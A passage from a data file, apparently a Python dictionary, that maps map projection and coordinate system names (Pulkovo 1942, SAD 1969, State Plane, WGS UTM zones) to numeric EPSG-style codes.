'Pulkovo_1942_GK_Zone_15': 28415, 'Pulkovo_1942_GK_Zone_16': 28416, 'Pulkovo_1942_GK_Zone_17': 28417, 'Pulkovo_1942_GK_Zone_18': 28418, 'Pulkovo_1942_GK_Zone_19': 28419, 'Pulkovo_1942_GK_Zone_20': 28420, 'Pulkovo_1942_GK_Zone_21': 28421, 'Pulkovo_1942_GK_Zone_22': 28422, 'Pulkovo_1942_GK_Zone_23': 28423, 'Pulkovo_1942_GK_Zone_24': 28424, 'Pulkovo_1942_GK_Zone_25': 28425, 'Pulkovo_1942_GK_Zone_26': 28426, 'Pulkovo_1942_GK_Zone_27': 28427, 'Pulkovo_1942_GK_Zone_28': 28428, 'Pulkovo_1942_GK_Zone_29': 28429, 'Pulkovo_1942_GK_Zone_30': 28430, 'Pulkovo_1942_GK_Zone_31': 28431, 'Pulkovo_1942_GK_Zone_32': 28432, 'Pulkovo_1942_GK_Zone_2N': 28462, 'Pulkovo_1942_GK_Zone_3N': 28463, 'Pulkovo_1942_GK_Zone_4N': 28464, 'Pulkovo_1942_GK_Zone_5N': 28465, 'Pulkovo_1942_GK_Zone_6N': 28466, 'Pulkovo_1942_GK_Zone_7N': 28467, 'Pulkovo_1942_GK_Zone_8N': 28468, 'Pulkovo_1942_GK_Zone_9N': 28469, 'Pulkovo_1942_GK_Zone_10N': 28470, 'Pulkovo_1942_GK_Zone_11N': 28471, 'Pulkovo_1942_GK_Zone_12N': 28472, 'Pulkovo_1942_GK_Zone_13N': 28473, 'Pulkovo_1942_GK_Zone_14N': 28474, 'Pulkovo_1942_GK_Zone_15N': 28475, 'Pulkovo_1942_GK_Zone_16N': 28476, 'Pulkovo_1942_GK_Zone_17N': 28477, 'Pulkovo_1942_GK_Zone_18N': 28478, 'Pulkovo_1942_GK_Zone_19N': 28479, 'Pulkovo_1942_GK_Zone_20N': 28480, 'Pulkovo_1942_GK_Zone_21N': 28481, 'Pulkovo_1942_GK_Zone_22N': 28482, 'Pulkovo_1942_GK_Zone_23N': 28483, 'Pulkovo_1942_GK_Zone_24N': 28484, 'Pulkovo_1942_GK_Zone_25N': 28485, 'Pulkovo_1942_GK_Zone_26N': 28486, 'Pulkovo_1942_GK_Zone_27N': 28487, 'Pulkovo_1942_GK_Zone_28N': 28488, 'Pulkovo_1942_GK_Zone_29N': 28489, 'Pulkovo_1942_GK_Zone_30N': 28490, 'Pulkovo_1942_GK_Zone_31N': 28491, 'Pulkovo_1942_GK_Zone_32N': 28492, 'Qatar_National_Grid': 28600, 'RD_Old': 28991, 'RD_New': 28992, 'SAD_1969_Brazil_Polyconic': 29100, 'SAD_1969_Brazil_Polyconic': 29101, 'SAD_1969_UTM_Zone_18N': 29118, 'SAD_1969_UTM_Zone_19N': 29119, 'SAD_1969_UTM_Zone_20N': 29120, 'SAD_1969_UTM_Zone_21N': 29121, 'SAD_1969_UTM_Zone_22N': 29122, 
'SAD_1969_UTM_Zone_18N': 29168, 'SAD_1969_UTM_Zone_19N': 29169, 'SAD_1969_UTM_Zone_20N': 29170, 'SAD_1969_UTM_Zone_21N': 29171, 'SAD_1969_UTM_Zone_22N': 29172, 'SAD_1969_UTM_Zone_17S': 29177, 'SAD_1969_UTM_Zone_18S': 29178, 'SAD_1969_UTM_Zone_19S': 29179, 'SAD_1969_UTM_Zone_20S': 29180, 'SAD_1969_UTM_Zone_21S': 29181, 'SAD_1969_UTM_Zone_22S': 29182, 'SAD_1969_UTM_Zone_23S': 29183, 'SAD_1969_UTM_Zone_24S': 29184, 'SAD_1969_UTM_Zone_25S': 29185, 'SAD_1969_UTM_Zone_17S': 29187, 'SAD_1969_UTM_Zone_18S': 29188, 'SAD_1969_UTM_Zone_19S': 29189, 'SAD_1969_UTM_Zone_20S': 29190, 'SAD_1969_UTM_Zone_21S': 29191, 'SAD_1969_UTM_Zone_22S': 29192, 'SAD_1969_UTM_Zone_23S': 29193, 'SAD_1969_UTM_Zone_24S': 29194, 'SAD_1969_UTM_Zone_25S': 29195, 'Sapper_Hill_1943_UTM_Zone_20S': 29220, 'Sapper_Hill_1943_UTM_Zone_21S': 29221, 'Schwarzeck_UTM_Zone_33S': 29333, 'Sudan_UTM_Zone_35N': 29635, 'Sudan_UTM_Zone_36N': 29636, 'Tananarive_1925_UTM_Zone_38S': 29738, 'Tananarive_1925_UTM_Zone_39S': 29739, 'Timbalai_1948_UTM_Zone_49N': 29849, 'Timbalai_1948_UTM_Zone_50N': 29850, 'Timbalai_1948_RSO_Borneo_Chains': 29871, 'Timbalai_1948_RSO_Borneo_Feet': 29872, 'Timbalai_1948_RSO_Borneo_Meters': 29873, 'TM65_Irish_Grid': 29900, 'OSNI_1952_Irish_National_Grid': 29901, 'TM65_Irish_Grid': 29902, 'TM75_Irish_Grid': 29903, 'Japan_Zone_1': 30161, 'Japan_Zone_2': 30162, 'Japan_Zone_3': 30163, 'Japan_Zone_4': 30164, 'Japan_Zone_5': 30165, 'Japan_Zone_6': 30166, 'Japan_Zone_7': 30167, 'Japan_Zone_8': 30168, 'Japan_Zone_9': 30169, 'Japan_Zone_10': 30170, 'Japan_Zone_11': 30171, 'Japan_Zone_12': 30172, 'Japan_Zone_13': 30173, 'Japan_Zone_14': 30174, 'Japan_Zone_15': 30175, 'Japan_Zone_16': 30176, 'Japan_Zone_17': 30177, 'Japan_Zone_18': 30178, 'Japan_Zone_19': 30179, 'Trinidad_1903_Trinidad_Grid': 30200, 'TC_1948_UTM_Zone_39N': 30339, 'TC_1948_UTM_Zone_40N': 30340, 'Nord_Algerie_Ancienne': 30491, 'Sud_Algerie_Ancienne': 30492, 'Voirol_1879_Nord_Algerie_Ancienne': 30493, 'Voirol_1879_Sud_Algerie_Ancienne': 30494, 
'Nord_Algerie': 30591, 'Sud_Algerie': 30592, 'Nord_Sahara_1959_UTM_Zone_29N': 30729, 'Nord_Sahara_1959_UTM_Zone_30N': 30730, 'Nord_Sahara_1959_UTM_Zone_31N': 30731, 'Nord_Sahara_1959_UTM_Zone_32N': 30732, 'Nord_Sahara_1959_Voirol_Unifie_Nord': 30791, 'Nord_Sahara_1959_Voirol_Unifie_Sud': 30792, 'Swedish_National_Grid': 30800, 'Yoff_1972_UTM_Zone_28N': 31028, 'Zanderij_1972_UTM_Zone_21N': 31121, 'Zanderij_TM_54_NW': 31154, 'Zanderij_Suriname_Old_TM': 31170, 'Zanderij_Suriname_TM': 31171, 'MGI_Ferro_Austria_GK_West': 31251, 'MGI_Ferro_Austria_GK_Central': 31252, 'MGI_Ferro_Austria_GK_East': 31253, 'MGI_Austria_GK_West': 31254, 'MGI_Austria_GK_Central': 31255, 'MGI_Austria_GK_East': 31256, 'MGI_Austria_GK_M28': 31257, 'MGI_Austria_GK_M31': 31258, 'MGI_Austria_GK_M34': 31259, 'MGI_3_Degree_Gauss_Zone_5': 31265, 'MGI_3_Degree_Gauss_Zone_6': 31266, 'MGI_3_Degree_Gauss_Zone_7': 31267, 'MGI_3_Degree_Gauss_Zone_8': 31268, 'MGI_Balkans_5': 31275, 'MGI_Balkans_6': 31276, 'MGI_Balkans_7': 31277, 'MGI_Balkans_8': 31278, 'MGI_Balkans_8': 31279, 'Austria_West_Zone': 31281, 'Austria_Central_Zone': 31282, 'Austria_East_Zone': 31283, 'MGI_M28': 31284, 'MGI_M31': 31285, 'MGI_M34': 31286, 'MGI_Austria_Lambert': 31287, 'MGI_Ferro_M28': 31288, 'MGI_Ferro_M31': 31289, 'MGI_Ferro_M34': 31290, 'Austria_West_Zone': 31291, 'Austria_Central_Zone': 31292, 'Austria_East_Zone': 31293, 'MGI_M28': 31294, 'MGI_M31': 31295, 'MGI_M34': 31296, 'MGI_Austria_Lambert': 31297, 'Belge_Lambert_1972': 31370, 'DHDN_3_Degree_Gauss_Zone_1': 31461, 'DHDN_3_Degree_Gauss_Zone_2': 31462, 'DHDN_3_Degree_Gauss_Zone_3': 31463, 'DHDN_3_Degree_Gauss_Zone_4': 31464, 'DHDN_3_Degree_Gauss_Zone_5': 31465, 'DHDN_3_Degree_Gauss_Zone_2': 31466, 'DHDN_3_Degree_Gauss_Zone_3': 31467, 'DHDN_3_Degree_Gauss_Zone_4': 31468, 'DHDN_3_Degree_Gauss_Zone_5': 31469, 'Germany_Zone_1': 31491, 'Germany_Zone_2': 31492, 'Germany_Zone_3': 31493, 'Germany_Zone_4': 31494, 'Germany_Zone_5': 31495, 'Conakry_1905_UTM_Zone_28N': 31528, 
'Conakry_1905_UTM_Zone_29N': 31529, 'Stereo_33': 31600, 'Stereo_70': 31700, 'NGN_UTM_Zone_38N': 31838, 'NGN_UTM_Zone_39N': 31839, 'KUDAMS_KTM': 31901, 'SIRGAS_UTM_Zone_17N': 31917, 'SIRGAS_UTM_Zone_18N': 31918, 'SIRGAS_UTM_Zone_19N': 31919, 'SIRGAS_UTM_Zone_20N': 31920, 'SIRGAS_UTM_Zone_21N': 31921, 'SIRGAS_UTM_Zone_22N': 31922, 'SIRGAS_2000_UTM_Zone_17N': 31971, 'SIRGAS_2000_UTM_Zone_18N': 31972, 'SIRGAS_2000_UTM_Zone_19N': 31973, 'SIRGAS_2000_UTM_Zone_20N': 31974, 'SIRGAS_2000_UTM_Zone_21N': 31975, 'SIRGAS_2000_UTM_Zone_22N': 31976, 'SIRGAS_2000_UTM_Zone_17S': 31977, 'SIRGAS_2000_UTM_Zone_18S': 31978, 'SIRGAS_2000_UTM_Zone_19S': 31979, 'SIRGAS_2000_UTM_Zone_20S': 31980, 'SIRGAS_2000_UTM_Zone_21S': 31981, 'SIRGAS_2000_UTM_Zone_22S': 31982, 'SIRGAS_2000_UTM_Zone_23S': 31983, 'SIRGAS_2000_UTM_Zone_24S': 31984, 'SIRGAS_2000_UTM_Zone_25S': 31985, 'SIRGAS_UTM_Zone_17N': 31986, 'SIRGAS_UTM_Zone_18N': 31987, 'SIRGAS_UTM_Zone_19N': 31988, 'SIRGAS_UTM_Zone_20N': 31989, 'SIRGAS_UTM_Zone_21N': 31990, 'SIRGAS_UTM_Zone_22N': 31991, 'SIRGAS_UTM_Zone_17S': 31992, 'SIRGAS_UTM_Zone_18S': 31993, 'SIRGAS_UTM_Zone_19S': 31994, 'SIRGAS_UTM_Zone_20S': 31995, 'SIRGAS_UTM_Zone_21S': 31996, 'SIRGAS_UTM_Zone_22S': 31997, 'SIRGAS_UTM_Zone_23S': 31998, 'SIRGAS_UTM_Zone_24S': 31999, 'SIRGAS_UTM_Zone_25S': 32000, 'NAD_1927_StatePlane_Montana_North_FIPS_2501': 32001, 'NAD_1927_StatePlane_Montana_Central_FIPS_2502': 32002, 'NAD_1927_StatePlane_Montana_South_FIPS_2503': 32003, 'NAD_1927_StatePlane_Nebraska_North_FIPS_2601': 32005, 'NAD_1927_StatePlane_Nebraska_South_FIPS_2602': 32006, 'NAD_1927_StatePlane_Nevada_East_FIPS_2701': 32007, 'NAD_1927_StatePlane_Nevada_Central_FIPS_2702': 32008, 'NAD_1927_StatePlane_Nevada_West_FIPS_2703': 32009, 'NAD_1927_StatePlane_New_Hampshire_FIPS_2800': 32010, 'NAD_1927_StatePlane_New_Jersey_FIPS_2900': 32011, 'NAD_1927_StatePlane_New_Mexico_East_FIPS_3001': 32012, 'NAD_1927_StatePlane_New_Mexico_Central_FIPS_3002': 32013, 
'NAD_1927_StatePlane_New_Mexico_West_FIPS_3003': 32014, 'NAD_1927_StatePlane_New_York_East_FIPS_3101': 32015, 'NAD_1927_StatePlane_New_York_Central_FIPS_3102': 32016, 'NAD_1927_StatePlane_New_York_West_FIPS_3103': 32017, 'NAD_1927_StatePlane_New_York_Long_Island_FIPS_3104': 32018, 'NAD_1927_StatePlane_North_Carolina_FIPS_3200': 32019, 'NAD_1927_StatePlane_North_Dakota_North_FIPS_3301': 32020, 'NAD_1927_StatePlane_North_Dakota_South_FIPS_3302': 32021, 'NAD_1927_StatePlane_Ohio_North_FIPS_3401': 32022, 'NAD_1927_StatePlane_Ohio_South_FIPS_3402': 32023, 'NAD_1927_StatePlane_Oklahoma_North_FIPS_3501': 32024, 'NAD_1927_StatePlane_Oklahoma_South_FIPS_3502': 32025, 'NAD_1927_StatePlane_Oregon_North_FIPS_3601': 32026, 'NAD_1927_StatePlane_Oregon_South_FIPS_3602': 32027, 'NAD_1927_StatePlane_Pennsylvania_North_FIPS_3701': 32028, 'NAD_1927_StatePlane_Pennsylvania_South_FIPS_3702': 32029, 'NAD_1927_StatePlane_Rhode_Island_FIPS_3800': 32030, 'NAD_1927_StatePlane_South_Carolina_North_FIPS_3901': 32031, 'NAD_1927_StatePlane_South_Carolina_South_FIPS_3902': 32033, 'NAD_1927_StatePlane_South_Dakota_North_FIPS_4001': 32034, 'NAD_1927_StatePlane_South_Dakota_South_FIPS_4002': 32035, 'NAD_1927_StatePlane_Tennessee_FIPS_4100': 32036, 'NAD_1927_StatePlane_Texas_North_FIPS_4201': 32037, 'NAD_1927_StatePlane_Texas_North_Central_FIPS_4202': 32038, 'NAD_1927_StatePlane_Texas_Central_FIPS_4203': 32039, 'NAD_1927_StatePlane_Texas_South_Central_FIPS_4204': 32040, 'NAD_1927_StatePlane_Texas_South_FIPS_4205': 32041, 'NAD_1927_StatePlane_Utah_North_FIPS_4301': 32042, 'NAD_1927_StatePlane_Utah_Central_FIPS_4302': 32043, 'NAD_1927_StatePlane_Utah_South_FIPS_4303': 32044, 'NAD_1927_StatePlane_Vermont_FIPS_4400': 32045, 'NAD_1927_StatePlane_Virginia_North_FIPS_4501': 32046, 'NAD_1927_StatePlane_Virginia_South_FIPS_4502': 32047, 'NAD_1927_StatePlane_Washington_North_FIPS_4601': 32048, 'NAD_1927_StatePlane_Washington_South_FIPS_4602': 32049, 'NAD_1927_StatePlane_West_Virginia_North_FIPS_4701': 32050, 
'NAD_1927_StatePlane_West_Virginia_South_FIPS_4702': 32051, 'NAD_1927_StatePlane_Wisconsin_North_FIPS_4801': 32052, 'NAD_1927_StatePlane_Wisconsin_Central_FIPS_4802': 32053, 'NAD_1927_StatePlane_Wisconsin_South_FIPS_4803': 32054, 'NAD_1927_StatePlane_Wyoming_East_FIPS_4901': 32055, 'NAD_1927_StatePlane_Wyoming_East_Central_FIPS_4902': 32056, 'NAD_1927_StatePlane_Wyoming_West_Central_FIPS_4903': 32057, 'NAD_1927_StatePlane_Wyoming_West_FIPS_4904': 32058, 'NAD_1927_StatePlane_Puerto_Rico_FIPS_5201': 32059, 'NAD_1927_StatePlane_Virgin_Islands_St_Croix_FIPS_5202': 32060, 'NAD_1927_Guatemala_Norte': 32061, 'NAD_1927_Guatemala_Sur': 32062, 'NAD_1927_BLM_Zone_14N': 32064, 'NAD_1927_BLM_Zone_15N': 32065, 'NAD_1927_BLM_Zone_16N': 32066, 'NAD_1927_BLM_Zone_17N': 32067, 'NAD_1927_BLM_Zone_14N': 32074, 'NAD_1927_BLM_Zone_15N': 32075, 'NAD_1927_BLM_Zone_16N': 32076, 'NAD_1927_BLM_Zone_17N': 32077, 'NAD_1927_MTM_1': 32081, 'NAD_1927_MTM_2': 32082, 'NAD_1927_MTM_3': 32083, 'NAD_1927_MTM_4': 32084, 'NAD_1927_MTM_5': 32085, 'NAD_1927_MTM_6': 32086, 'NAD_1927_Quebec_Lambert': 32098, 'NAD_1927_StatePlane_Louisiana_Offshore_FIPS_1703': 32099, 'NAD_1983_StatePlane_Montana_FIPS_2500': 32100, 'NAD_1983_StatePlane_Nebraska_FIPS_2600': 32104, 'NAD_1983_StatePlane_Nevada_East_FIPS_2701': 32107, 'NAD_1983_StatePlane_Nevada_Central_FIPS_2702': 32108, 'NAD_1983_StatePlane_Nevada_West_FIPS_2703': 32109, 'NAD_1983_StatePlane_New_Hampshire_FIPS_2800': 32110, 'NAD_1983_StatePlane_New_Jersey_FIPS_2900': 32111, 'NAD_1983_StatePlane_New_Mexico_East_FIPS_3001': 32112, 'NAD_1983_StatePlane_New_Mexico_Central_FIPS_3002': 32113, 'NAD_1983_StatePlane_New_Mexico_West_FIPS_3003': 32114, 'NAD_1983_StatePlane_New_York_East_FIPS_3101': 32115, 'NAD_1983_StatePlane_New_York_Central_FIPS_3102': 32116, 'NAD_1983_StatePlane_New_York_West_FIPS_3103': 32117, 'NAD_1983_StatePlane_New_York_Long_Island_FIPS_3104': 32118, 'NAD_1983_StatePlane_North_Carolina_FIPS_3200': 32119, 
'NAD_1983_StatePlane_North_Dakota_North_FIPS_3301': 32120, 'NAD_1983_StatePlane_North_Dakota_South_FIPS_3302': 32121, 'NAD_1983_StatePlane_Ohio_North_FIPS_3401': 32122, 'NAD_1983_StatePlane_Ohio_South_FIPS_3402': 32123, 'NAD_1983_StatePlane_Oklahoma_North_FIPS_3501': 32124, 'NAD_1983_StatePlane_Oklahoma_South_FIPS_3502': 32125, 'NAD_1983_StatePlane_Oregon_North_FIPS_3601': 32126, 'NAD_1983_StatePlane_Oregon_South_FIPS_3602': 32127, 'NAD_1983_StatePlane_Pennsylvania_North_FIPS_3701': 32128, 'NAD_1983_StatePlane_Pennsylvania_South_FIPS_3702': 32129, 'NAD_1983_StatePlane_Rhode_Island_FIPS_3800': 32130, 'NAD_1983_StatePlane_South_Carolina_FIPS_3900': 32133, 'NAD_1983_StatePlane_South_Dakota_North_FIPS_4001': 32134, 'NAD_1983_StatePlane_South_Dakota_South_FIPS_4002': 32135, 'NAD_1983_StatePlane_Tennessee_FIPS_4100': 32136, 'NAD_1983_StatePlane_Texas_North_FIPS_4201': 32137, 'NAD_1983_StatePlane_Texas_North_Central_FIPS_4202': 32138, 'NAD_1983_StatePlane_Texas_Central_FIPS_4203': 32139, 'NAD_1983_StatePlane_Texas_South_Central_FIPS_4204': 32140, 'NAD_1983_StatePlane_Texas_South_FIPS_4205': 32141, 'NAD_1983_StatePlane_Utah_North_FIPS_4301': 32142, 'NAD_1983_StatePlane_Utah_Central_FIPS_4302': 32143, 'NAD_1983_StatePlane_Utah_South_FIPS_4303': 32144, 'NAD_1983_StatePlane_Vermont_FIPS_4400': 32145, 'NAD_1983_StatePlane_Virginia_North_FIPS_4501': 32146, 'NAD_1983_StatePlane_Virginia_South_FIPS_4502': 32147, 'NAD_1983_StatePlane_Washington_North_FIPS_4601': 32148, 'NAD_1983_StatePlane_Washington_South_FIPS_4602': 32149, 'NAD_1983_StatePlane_West_Virginia_North_FIPS_4701': 32150, 'NAD_1983_StatePlane_West_Virginia_South_FIPS_4702': 32151, 'NAD_1983_StatePlane_Wisconsin_North_FIPS_4801': 32152, 'NAD_1983_StatePlane_Wisconsin_Central_FIPS_4802': 32153, 'NAD_1983_StatePlane_Wisconsin_South_FIPS_4803': 32154, 'NAD_1983_StatePlane_Wyoming_East_FIPS_4901': 32155, 'NAD_1983_StatePlane_Wyoming_East_Central_FIPS_4902': 32156, 'NAD_1983_StatePlane_Wyoming_West_Central_FIPS_4903': 32157, 
'NAD_1983_StatePlane_Wyoming_West_FIPS_4904': 32158, 'NAD_1983_StatePlane_Puerto_Rico_Virgin_Islands_FIPS_5200': 32161, 'NAD_1983_BLM_Zone_14N_ftUS': 32164, 'NAD_1983_BLM_Zone_15N_ftUS': 32165, 'NAD_1983_BLM_Zone_16N_ftUS': 32166, 'NAD_1983_BLM_Zone_17N_ftUS': 32167, 'NAD_1983_MTM_2_SCoPQ': 32180, 'NAD_1983_MTM_1': 32181, 'NAD_1983_MTM_2': 32182, 'NAD_1983_MTM_3': 32183, 'NAD_1983_MTM_4': 32184, 'NAD_1983_MTM_5': 32185, 'NAD_1983_MTM_6': 32186, 'NAD_1983_MTM_7': 32187, 'NAD_1983_MTM_8': 32188, 'NAD_1983_MTM_9': 32189, 'NAD_1983_MTM_10': 32190, 'NAD_1983_MTM_11': 32191, 'NAD_1983_MTM_12': 32192, 'NAD_1983_MTM_13': 32193, 'NAD_1983_MTM_14': 32194, 'NAD_1983_MTM_15': 32195, 'NAD_1983_MTM_16': 32196, 'NAD_1983_MTM_17': 32197, 'NAD_1983_Quebec_Lambert': 32198, 'NAD_1983_StatePlane_Louisiana_Offshore_FIPS_1703': 32199, 'WGS_1972_UTM_Zone_1N': 32201, 'WGS_1972_UTM_Zone_2N': 32202, 'WGS_1972_UTM_Zone_3N': 32203, 'WGS_1972_UTM_Zone_4N': 32204, 'WGS_1972_UTM_Zone_5N': 32205, 'WGS_1972_UTM_Zone_6N': 32206, 'WGS_1972_UTM_Zone_7N': 32207, 'WGS_1972_UTM_Zone_8N': 32208, 'WGS_1972_UTM_Zone_9N': 32209, 'WGS_1972_UTM_Zone_10N': 32210, 'WGS_1972_UTM_Zone_11N': 32211, 'WGS_1972_UTM_Zone_12N': 32212, 'WGS_1972_UTM_Zone_13N': 32213, 'WGS_1972_UTM_Zone_14N': 32214, 'WGS_1972_UTM_Zone_15N': 32215, 'WGS_1972_UTM_Zone_16N': 32216, 'WGS_1972_UTM_Zone_17N': 32217, 'WGS_1972_UTM_Zone_18N': 32218, 'WGS_1972_UTM_Zone_19N': 32219, 'WGS_1972_UTM_Zone_20N': 32220, 'WGS_1972_UTM_Zone_21N': 32221, 'WGS_1972_UTM_Zone_22N': 32222, 'WGS_1972_UTM_Zone_23N': 32223, 'WGS_1972_UTM_Zone_24N': 32224, 'WGS_1972_UTM_Zone_25N': 32225, 'WGS_1972_UTM_Zone_26N': 32226, 'WGS_1972_UTM_Zone_27N': 32227, 'WGS_1972_UTM_Zone_28N': 32228, 'WGS_1972_UTM_Zone_29N': 32229, 'WGS_1972_UTM_Zone_30N': 32230, 'WGS_1972_UTM_Zone_31N': 32231, 'WGS_1972_UTM_Zone_32N': 32232, 'WGS_1972_UTM_Zone_33N': 32233, 'WGS_1972_UTM_Zone_34N': 32234, 'WGS_1972_UTM_Zone_35N': 32235, 'WGS_1972_UTM_Zone_36N': 32236, 'WGS_1972_UTM_Zone_37N': 32237, 
'WGS_1972_UTM_Zone_38N': 32238, 'WGS_1972_UTM_Zone_39N': 32239, 'WGS_1972_UTM_Zone_40N': 32240, 'WGS_1972_UTM_Zone_41N': 32241, 'WGS_1972_UTM_Zone_42N': 32242, 'WGS_1972_UTM_Zone_43N': 32243, 'WGS_1972_UTM_Zone_44N': 32244, 'WGS_1972_UTM_Zone_45N': 32245, 'WGS_1972_UTM_Zone_46N': 32246, 'WGS_1972_UTM_Zone_47N': 32247, 'WGS_1972_UTM_Zone_48N': 32248, 'WGS_1972_UTM_Zone_49N': 32249, 'WGS_1972_UTM_Zone_50N': 32250, 'WGS_1972_UTM_Zone_51N': 32251, 'WGS_1972_UTM_Zone_52N': 32252, 'WGS_1972_UTM_Zone_53N': 32253, 'WGS_1972_UTM_Zone_54N': 32254, 'WGS_1972_UTM_Zone_55N': 32255, 'WGS_1972_UTM_Zone_56N': 32256, 'WGS_1972_UTM_Zone_57N': 32257, 'WGS_1972_UTM_Zone_58N': 32258, 'WGS_1972_UTM_Zone_59N': 32259, 'WGS_1972_UTM_Zone_60N': 32260, 'WGS_1972_UTM_Zone_1S': 32301, 'WGS_1972_UTM_Zone_2S': 32302, 'WGS_1972_UTM_Zone_3S': 32303, 'WGS_1972_UTM_Zone_4S': 32304, 'WGS_1972_UTM_Zone_5S': 32305, 'WGS_1972_UTM_Zone_6S': 32306, 'WGS_1972_UTM_Zone_7S': 32307, 'WGS_1972_UTM_Zone_8S': 32308, 'WGS_1972_UTM_Zone_9S': 32309, 'WGS_1972_UTM_Zone_10S': 32310, 'WGS_1972_UTM_Zone_11S': 32311, 'WGS_1972_UTM_Zone_12S': 32312, 'WGS_1972_UTM_Zone_13S': 32313, 'WGS_1972_UTM_Zone_14S': 32314, 'WGS_1972_UTM_Zone_15S': 32315, 'WGS_1972_UTM_Zone_16S': 32316, 'WGS_1972_UTM_Zone_17S': 32317, 'WGS_1972_UTM_Zone_18S': 32318, 'WGS_1972_UTM_Zone_19S': 32319, 'WGS_1972_UTM_Zone_20S': 32320, 'WGS_1972_UTM_Zone_21S': 32321, 'WGS_1972_UTM_Zone_22S': 32322, 'WGS_1972_UTM_Zone_23S': 32323, 'WGS_1972_UTM_Zone_24S': 32324, 'WGS_1972_UTM_Zone_25S': 32325, 'WGS_1972_UTM_Zone_26S': 32326, 'WGS_1972_UTM_Zone_27S': 32327, 'WGS_1972_UTM_Zone_28S': 32328, 'WGS_1972_UTM_Zone_29S': 32329, 'WGS_1972_UTM_Zone_30S': 32330, 'WGS_1972_UTM_Zone_31S': 32331, 'WGS_1972_UTM_Zone_32S': 32332, 'WGS_1972_UTM_Zone_33S': 32333, 'WGS_1972_UTM_Zone_34S': 32334, 'WGS_1972_UTM_Zone_35S': 32335, 'WGS_1972_UTM_Zone_36S': 32336, 'WGS_1972_UTM_Zone_37S': 32337, 'WGS_1972_UTM_Zone_38S': 32338, 'WGS_1972_UTM_Zone_39S': 32339, 'WGS_1972_UTM_Zone_40S': 
32340, 'WGS_1972_UTM_Zone_41S': 32341, 'WGS_1972_UTM_Zone_42S': 32342, 'WGS_1972_UTM_Zone_43S': 32343, 'WGS_1972_UTM_Zone_44S': 32344, 'WGS_1972_UTM_Zone_45S': 32345, 'WGS_1972_UTM_Zone_46S': 32346, 'WGS_1972_UTM_Zone_47S': 32347, 'WGS_1972_UTM_Zone_48S': 32348, 'WGS_1972_UTM_Zone_49S': 32349, 'WGS_1972_UTM_Zone_50S': 32350, 'WGS_1972_UTM_Zone_51S': 32351, 'WGS_1972_UTM_Zone_52S': 32352, 'WGS_1972_UTM_Zone_53S': 32353, 'WGS_1972_UTM_Zone_54S': 32354, 'WGS_1972_UTM_Zone_55S': 32355, 'WGS_1972_UTM_Zone_56S': 32356, 'WGS_1972_UTM_Zone_57S': 32357, 'WGS_1972_UTM_Zone_58S': 32358, 'WGS_1972_UTM_Zone_59S': 32359, 'WGS_1972_UTM_Zone_60S': 32360, 'WGS_1984_UTM_Zone_1N': 32601, 'WGS_1984_UTM_Zone_2N': 32602, 'WGS_1984_UTM_Zone_3N': 32603, 'WGS_1984_UTM_Zone_4N': 32604, 'WGS_1984_UTM_Zone_5N': 32605, 'WGS_1984_UTM_Zone_6N': 32606, 'WGS_1984_UTM_Zone_7N': 32607, 'WGS_1984_UTM_Zone_8N': 32608, 'WGS_1984_UTM_Zone_9N': 32609, 'WGS_1984_UTM_Zone_10N': 32610, 'WGS_1984_UTM_Zone_11N': 32611, 'WGS_1984_UTM_Zone_12N': 32612, 'WGS_1984_UTM_Zone_13N': 32613, 'WGS_1984_UTM_Zone_14N': 32614, 'WGS_1984_UTM_Zone_15N': 32615, 'WGS_1984_UTM_Zone_16N': 32616, 'WGS_1984_UTM_Zone_17N': 32617, 'WGS_1984_UTM_Zone_18N': 32618, 'WGS_1984_UTM_Zone_19N': 32619, 'WGS_1984_UTM_Zone_20N': 32620, 'WGS_1984_UTM_Zone_21N': 32621, 'WGS_1984_UTM_Zone_22N': 32622, 'WGS_1984_UTM_Zone_23N': 32623, 'WGS_1984_UTM_Zone_24N': 32624, 'WGS_1984_UTM_Zone_25N': 32625, 'WGS_1984_UTM_Zone_26N': 32626, 'WGS_1984_UTM_Zone_27N': 32627, 'WGS_1984_UTM_Zone_28N': 32628, 'WGS_1984_UTM_Zone_29N': 32629, 'WGS_1984_UTM_Zone_30N': 32630, 'WGS_1984_UTM_Zone_31N': 32631, 'WGS_1984_UTM_Zone_32N': 32632, 'WGS_1984_UTM_Zone_33N': 32633, 'WGS_1984_UTM_Zone_34N': 32634, 'WGS_1984_UTM_Zone_35N': 32635, 'WGS_1984_UTM_Zone_36N': 32636, 'WGS_1984_UTM_Zone_37N': 32637, 'WGS_1984_UTM_Zone_38N': 32638, 'WGS_1984_UTM_Zone_39N': 32639, 'WGS_1984_UTM_Zone_40N': 32640, 'WGS_1984_UTM_Zone_41N': 32641, 'WGS_1984_UTM_Zone_42N': 32642, 
'WGS_1984_UTM_Zone_43N': 32643, 'WGS_1984_UTM_Zone_44N': 32644, 'WGS_1984_UTM_Zone_45N': 32645, 'WGS_1984_UTM_Zone_46N': 32646, 'WGS_1984_UTM_Zone_47N': 32647, 'WGS_1984_UTM_Zone_48N': 32648, 'WGS_1984_UTM_Zone_49N': 32649, 'WGS_1984_UTM_Zone_50N': 32650, 'WGS_1984_UTM_Zone_51N': 32651, 'WGS_1984_UTM_Zone_52N': 32652, 'WGS_1984_UTM_Zone_53N': 32653, 'WGS_1984_UTM_Zone_54N': 32654, 'WGS_1984_UTM_Zone_55N': 32655, 'WGS_1984_UTM_Zone_56N': 32656, 'WGS_1984_UTM_Zone_57N': 32657, 'WGS_1984_UTM_Zone_58N': 32658, 'WGS_1984_UTM_Zone_59N': 32659, 'WGS_1984_UTM_Zone_60N': 32660, 'UPS_North': 32661, 'WGS_1984_Plate_Carree': 32662, 'WGS_1984_BLM_Zone_14N_ftUS': 32664, 'WGS_1984_BLM_Zone_15N_ftUS': 32665, 'WGS_1984_BLM_Zone_16N_ftUS': 32666, 'WGS_1984_BLM_Zone_17N_ftUS': 32667, 'WGS_1984_UTM_Zone_1S': 32701, 'WGS_1984_UTM_Zone_2S': 32702, 'WGS_1984_UTM_Zone_3S': 32703, 'WGS_1984_UTM_Zone_4S': 32704, 'WGS_1984_UTM_Zone_5S': 32705, 'WGS_1984_UTM_Zone_6S': 32706, 'WGS_1984_UTM_Zone_7S': 32707, 'WGS_1984_UTM_Zone_8S': 32708, 'WGS_1984_UTM_Zone_9S': 32709, 'WGS_1984_UTM_Zone_10S': 32710, 'WGS_1984_UTM_Zone_11S': 32711, 'WGS_1984_UTM_Zone_12S': 32712, 'WGS_1984_UTM_Zone_13S': 32713, 'WGS_1984_UTM_Zone_14S': 32714, 'WGS_1984_UTM_Zone_15S': 32715, 'WGS_1984_UTM_Zone_16S': 32716, 'WGS_1984_UTM_Zone_17S': 32717, 